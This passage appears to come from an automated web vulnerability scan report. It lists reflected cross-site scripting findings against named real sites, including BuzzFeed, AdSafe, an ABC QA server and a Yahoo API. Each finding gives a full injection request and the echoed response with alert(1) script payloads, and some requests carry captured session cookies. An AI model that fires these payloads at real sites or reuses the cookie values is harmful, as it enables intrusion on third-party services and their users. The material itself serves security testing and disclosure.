User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 354
Content-Type: text/html
Cache-Control: private
Content-Length: 354

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/video/533636951/x91f12c6"><script>alert(1)</script>11ed6697784/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...

4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63857/8b52baa86e5b07ac085974feb13e2090

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6767c<script>alert(1)</script>579e3c6c8aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa&cb=8827 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:58:05 GMT
Date: Sat, 17 Sep 2011 00:58:05 GMT
Connection: close

BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa(1316209757);

4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63857/bb0a99aabad3110617eff2ef79bb3c27

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cffa8<script>alert(1)</script>3083eeb5b42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42&cb=6085 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 01:01:56 GMT
Date: Sat, 17 Sep 2011 01:01:56 GMT
Connection: close

BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42(1316190553);

4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63857/d9dfb925d83ec9decb12af7e255ebee7

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e276d<script>alert(1)</script>39fac306275 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275&cb=984 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:59:19 GMT
Date: Sat, 17 Sep 2011 00:59:19 GMT
Connection: close

BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275(1316110396);

4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f9e"-alert(1)-"4993f914f2 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85C4E9B1CE6AFEC2478698F24E6FB3D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:34 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av5mn"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="t
...[SNIP]...

4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8394"-alert(1)-"5aa455f48a3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1CD64CE4ACF13A13714A33EC4F9E56D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av7iz"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={
...[SNIP]...

4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af364"-alert(1)-"9591c354c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8F12D5393B81356B131F4FF06E12958; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av7ya"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I
...[SNIP]...

4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a0dd"-alert(1)-"c19b890ed0c was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA4ADE180D50AB2EABEDD27FA7E62877; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:36 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av6jf"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var
...[SNIP]...

4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://qa.n7.vp2.abc.go.com
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 775ff<a>a5eff5e8762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /crossdomain.xml775ff<a>a5eff5e8762 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5943
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<div id="exception">
exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (crossdomain.xml775ff<a>a5eff5e8762)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248
Stack trace:
#0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa
...[SNIP]...

4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 650a7--><script>alert(1)</script>b7520712271 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5974
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 -->
...[SNIP]...

4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /xml/alert.xml

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b628c--><script>alert(1)</script>5426b9bf004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5982
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 -->
...[SNIP]...

4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://qa.n7.vp2.abc.go.com
Path:   /xml/alert.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37608<a>6a6ab97d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /xml37608<a>6a6ab97d218/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5951
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<div id="exception">
exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (xml37608<a>6a6ab97d218)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248
Stack trace:
#0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa
...[SNIP]...

4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /xml/alert.xml

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b2040--><script>alert(1)</script>de55340569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5956
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 -->
...[SNIP]...

4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /v1/public/yql/uhTrending/cokeTrending2

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 975e8<script>alert(1)</script>8e1784da2c was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1975e8<script>alert(1)</script>8e1784da2c HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:26 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 177

